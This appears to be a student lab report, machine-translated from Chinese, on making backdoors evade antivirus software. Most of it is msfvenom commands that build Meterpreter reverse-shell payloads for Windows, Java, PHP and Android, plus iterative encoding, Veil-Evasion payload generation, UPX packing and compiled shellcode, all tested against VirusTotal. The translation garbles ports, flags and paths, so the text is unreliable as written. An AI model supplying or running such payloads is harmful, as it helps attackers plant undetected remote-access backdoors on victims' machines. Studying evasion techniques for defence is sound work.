1. Proper use msf encoder
Using VirusTotal or Virscan both sites for backdoors second experiment generated meter_backdoor.exe scan
Try msf of backdoor encoded once to several times, and the encoder is detected, as follows
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.3.26 LPORT=5215 -f exe > encoded1.exe
Use -i set number of iterations , for encoding ten times , and found that after the detection is not satisfactory
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.196.133 LPORT=5121 -f exe > encoded10.exe
2. msfvenom generating The jar other document or the like
Using the following code generator java backdoor and Detection:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5124 x> meter_backdoor_java.jar
Using the following code generator php backdoor and Detection:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5124 x> meter_backdoor.php
Using the following code generation Android backdoor and detection
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.198.128 lport=5124 x> Android_backdoor.apk
3. veil
veil installation I suffered enough, try a variety of methods, and repeatedly dozen times, when a few days there have been a variety of inexplicable bug , finally inexplicable well, and in this elaborate about the installation experience.
First, open source add USTC and Ali cloud, and will run the code
apt-get update
apt-get upgrade -y
apt-get install veil-evasion // mounted reliance
veil // run the installation
Then the first question is, is excruciatingly slow download download fails, I use the following method after Baidu:
1 : Change the host settings
failure
2:使用git config --global http.proxy 'socks5://127.0.0.1:1080'
failure
3 : cd / usr / report this content share / Veil / config / enter folder
setup.sh vim , editor of the 260 line, the github repository into a cloud code repository: https://gitee.com/spears/VeilDependencies.git
success! ! !
Continue the installation
(Use s default installation)
(Finally completed the installation)
Input veil command, enter use evasion into the following page
Enter the command use c / meterpreter / rev_tcp.py configuration interface
Provided recall connection the IP: 192.168.198.128 lhost SET (here KaliIP ), Port: SET 51 is LPORT 24
Input command generate generated files, and then want to take the input payload name: veil_c_51 24 , as shown in FIG language file to generate C language file, the payload module is a TCP rebound type, save path: / var / lib / Veil / the Output / handlers / veil_c_51 24.rc
Use VirusTotal detect the file .
(Clearance, indeed my boss spent the effort and made things)
4. packers tools
Added compressed shell the UPX , input upx meter_backdoor.exe -o operator Stoker's .upxed.exe
The use of C + shellcode programming
Use the command msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.198.1 LPORT = 5124 -fc generation period the shellcode .
Create a file test.c , then unsigned char buf [] assigned to it.
Enter i686-W64-mingw32-G ++ test.c -o 20175124.exe , this file is an executable file compiled and tested.
6. Use other classroom does not describe the method
Free to kill again into the platform , remember to enter use evasion
Enter the list to view the available payloads
We use python to compile input use python / meterpreter / rev_tcp.py enter the configuration page.
Input set LHOST 192.168.198.128 and SET LPORT 51 is 24 , are provided to connect the rebound IP address and port number.
Enter generate generate file, follow the prompts to enter the file name: 201 751 24-
Use VirusTotal detect file
9. The basic questions answered
( 1 How to) kill soft is detected malicious code?
Using readily available anti-virus software to scan the sample to be analyzed to determine whether the code contains a virus.
In the Windows platform, binary executable yywrexe and dll are based on pe file format organization, and in linux platform, executable file format is ELF .
Sometimes authors of malicious code will be placed in a specific his work url or email address, or malicious code to use a particular library files and functions. Using character string extracting technique, we may analyze the structure and function of malicious code.
( 2 ) is free to kill what to do?
Free to kill is by modifying the PE code or configuration file to achieve the purpose of killing evade anti-virus software
( 3 ) basic methods to avoid killing what?
Changing the signature: this experiment operations msf coding, Veil , packers, the shellcode belong to a different signature.
Change behavior: Use a rebound connection, tunneling, encryption, data communications and so on.
( 4 ) open soft kill can absolutely prevent computer malicious code do ?
No, some of the soft kill virus software signature recognition after the change does not come out, so open and kill the soft can not prevent malicious computer code.
10. Practice and Experience summary
I did this experiment is the most painful one, could have done it, but the veil of installation is too grueling, and dragged about like two or three days, and with reference to the students of the previous installation methods , reviewed numerous posts, every time forty minutes to try two or three hours, back and forth a dozen times, and finally installed, installed at that moment, when I felt a glimmer of emptiness and relief . The experimental content on free to kill, in many ways finally killing anti-virus software and reduced vigilance site for the back door, but this is only the skill of one-tenth of anti-virus software , if you want to achieve a qualified antivirus software , and that the difficulty of it must have been very difficult. Only know the capabilities of these backdoor software, can help us to do network security to let us in the future to fulfill their duties .